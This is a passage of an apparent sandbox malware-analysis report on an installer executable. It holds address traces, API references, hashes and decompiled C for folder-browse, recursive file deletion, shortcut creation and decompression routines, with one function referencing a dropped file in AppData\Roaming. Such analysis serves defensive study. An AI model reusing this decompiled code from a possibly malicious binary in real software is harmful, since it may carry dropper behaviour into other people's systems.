                            0x00404b65
                            0x00404b6c
                            0x00404b6f
                            0x00404bab
                            0x00404bad
                            0x00404bb3
                            0x00404bb8
                            0x00404bbc
                            0x00404bbe
                            0x00404bbe
                            0x00404bda
                            0x00000000
                            0x00404bdc
                            0x00404bdf
                            0x00404bed
                            0x00404bf3
                            0x00404bf4
                            0x00404bf7
                            0x00404bfa
                            0x00000000
                            0x00404bfa
                            0x00404b71
                            0x00404b73
                            0x00404b77
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00404b79
                            0x00404b79
                            0x00404b86
                            0x00404b8b
                            0x00000000
                            0x00000000
                            0x00404b8f
                            0x00404b91
                            0x00404b91
                            0x00404b9a
                            0x00404b9c
                            0x00404ba1
                            0x00404ba4
                            0x00404ba9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00404ba9
                            0x00404c06
                            0x00404c10
                            0x00404c13
                            0x00404c16
                            0x00404c1d
                            0x00404c1d
                            0x00404c1f
                            0x00404c1f
                            0x00404c24
                            0x00404c26
                            0x00404c2e
                            0x00404c35
                            0x00404c37
                            0x00404c42
                            0x00404c42
                            0x00404c37
                            0x00404c52
                            0x00404c5c
                            0x00404c64
                            0x00404c7f
                            0x00404c66
                            0x00404c6f
                            0x00404c6f
                            0x00404c64
                            0x00404c84
                            0x00404c89
                            0x00404c8e
                            0x00404c97
                            0x00404c97
                            0x00404ca0
                            0x00404ca2
                            0x00404ca2
                            0x00404cae
                            0x00404cb6
                            0x00404cc0
                            0x00404cc0
                            0x00404cc5
                            0x00000000
                            0x00404cc5
                            0x00404b6f
                            0x00404b26
                            0x00404b2d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00404b2d
                            0x00404a4c
                            0x00404a55
                            0x00404a6f
                            0x00404a74
                            0x00404a7e
                            0x00404a85
                            0x00404a91
                            0x00404a94
                            0x00404a97
                            0x00404a9e
                            0x00404aa6
                            0x00404aa9
                            0x00404aad
                            0x00404ab4
                            0x00404abc
                            0x00404b16
                            0x00404abe
                            0x00404abf
                            0x00404ac6
                            0x00404ad0
                            0x00404ad8
                            0x00404ae5
                            0x00404af9
                            0x00404afd
                            0x00404afd
                            0x00404af9
                            0x00404b02
                            0x00404b0f
                            0x00404b0f
                            0x00404abc
                            0x00000000
                            0x00404a74
                            0x00404a62
                            0x00000000
                            0x00000000
                            0x00404a68
                            0x00000000
                            0x004049d3
                            0x004049e0
                            0x004049e9
                            0x004049f6
                            0x004049f6
                            0x004049fd
                            0x00404a03
                            0x00404a0c
                            0x00404a0f
                            0x00404a12
                            0x00404a1a
                            0x00404a1d
                            0x00404a20
                            0x00404a26
                            0x00404a2d
                            0x00404a34
                            0x00404ccb
                            0x00404cdd
                            0x00404a3a
                            0x00404a3d
                            0x00000000
                            0x00404a3d
                            0x00404a34

                            APIs
                            • GetDlgItem.USER32 ref: 004049D9
                            • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,0042D268,00000000,?,?), ref: 00404AF1
                            • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Roaming\34432.exe), ref: 00404AFD
                            • SetDlgItemTextW.USER32 ref: 00404B0F
                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                              • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                              • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                              • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: A$C:\Users\user\AppData\Roaming\34432.exe
                            • API String ID: 2624150263-3588490
                            • Opcode ID: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                            • Opcode Fuzzy Hash: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                            0x00405c53
                            0x00405c58
                            0x00405c61
                            0x00405c64
                            0x00405c6c
                            0x00405c6f
                            0x00405c72
                            0x00405c7a
                            0x00405c7c
                            0x00405c7d
                            0x00000000
                            0x00405c7d
                            0x00405c88
                            0x00405c8b
                            0x00405c8b
                            0x00405c8b
                            0x00405c8f
                            0x00405ca2
                            0x00405ca9
                            0x00405cae
                            0x00405cb2
                            0x00405cc2
                            0x00405cb4
                            0x00405cba
                            0x00405cba
                            0x00405cc7
                            0x00405ccb
                            0x00405cd7
                            0x00405cdd
                            0x00405ce2
                            0x00405ce8
                            0x00405cf3
                            0x00405cf9
                            0x00405cfb
                            0x00405cfe
                            0x00405da8
                            0x00405da8
                            0x00405dac
                            0x00405dae
                            0x00405dae
                            0x00405dae
                            0x00405dae
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405d04
                            0x00405d04
                            0x00405d04
                            0x00405d0c
                            0x00405d2c
                            0x00405d34
                            0x00405d39
                            0x00405d40
                            0x00405d5b
                            0x00405d60
                            0x00405d62
                            0x00405d86
                            0x00405d64
                            0x00405d64
                            0x00405d67
                            0x00405d7b
                            0x00405d69
                            0x00405d6c
                            0x00405d74
                            0x00405d74
                            0x00405d67
                            0x00405d42
                            0x00405d48
                            0x00405d4a
                            0x00405d50
                            0x00405d50
                            0x00405d4a
                            0x00000000
                            0x00405d40
                            0x00405d0e
                            0x00405d16
                            0x00000000
                            0x00000000
                            0x00405d18
                            0x00405d20
                            0x00000000
                            0x00000000
                            0x00405d22
                            0x00405d2a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405d8b
                            0x00405d93
                            0x00405d99
                            0x00405d99
                            0x00405da2
                            0x00000000
                            0x00405da2
                            0x00405ccd
                            0x00405cd5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405c91
                            0x00405c91
                            0x00405c93
                            0x00405db3
                            0x00405db5
                            0x00405db8
                            0x00405e09
                            0x00405e09
                            0x00405e09
                            0x00405dba
                            0x00405dbd
                            0x00405dc8
                            0x00405dcd
                            0x00405dcf
                            0x00000000
                            0x00000000
                            0x00405dd2
                            0x00405dde
                            0x00405de3
                            0x00405de5
                            0x00000000
                            0x00405e00
                            0x00405de7
                            0x00405dea
                            0x00000000
                            0x00000000
                            0x00405def
                            0x00000000
                            0x00405df6
                            0x00405dbf
                            0x00405dbf
                            0x00000000
                            0x00405dbf
                            0x00405c99
                            0x00405c9c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405c9c

                            APIs
                            • DeleteFileW.KERNEL32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                            • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                            • API String ID: 2035342205-4130279798
                            • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                            • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                            0x0040687e
                            0x00406887
                            0x00000000
                            0x00406894
                            0x0040688a
                            0x00000000

                            APIs
                            • FindFirstFileW.KERNEL32(76CDFAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                            • FindClose.KERNEL32(00000000), ref: 0040688A
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                            • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                            • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                            • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                            0x004021b3
                            0x004021bd
                            0x004021c7
                            0x004021d1
                            0x004021dc
                            0x004021df
                            0x004021f9
                            0x004021fc
                            0x00402202
                            0x00402205
                            0x0040220f
                            0x00402213
                            0x00402213
                            0x00402218
                            0x00402229
                            0x00402231
                            0x004022e8
                            0x004022e8
                            0x004022ef
                            0x00402237
                            0x00402237
                            0x00402246
                            0x0040224a
                            0x0040224d
                            0x00402253
                            0x00402261
                            0x00402264
                            0x00402266
                            0x00402271
                            0x00402271
                            0x00402276
                            0x00402278
                            0x0040227f
                            0x0040227f
                            0x00402282
                            0x0040228b
                            0x0040228e
                            0x00402294
                            0x00402296
                            0x004022a0
                            0x004022a0
                            0x004022a3
                            0x004022ac
                            0x004022af
                            0x004022b8
                            0x004022be
                            0x004022c0
                            0x004022ce
                            0x004022ce
                            0x004022d1
                            0x004022d7
                            0x004022d7
                            0x004022da
                            0x004022e0
                            0x004022e6
                            0x004022fb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004022e6
                            0x004022f1
                            0x00402c2d
                            0x00402c39

                            APIs
                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                            • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 39%
                            			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                            0x00402923
                            0x0040293e
                            0x00402949
                            0x0040294a
                            0x00402a94
                            0x00402925
                            0x00402928
                            0x0040292b
                            0x0040292e
                            0x0040292e
                            0x00402c2d
                            0x00402c39

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                            • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406D85 Relevance: .3, Instructions: 334COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
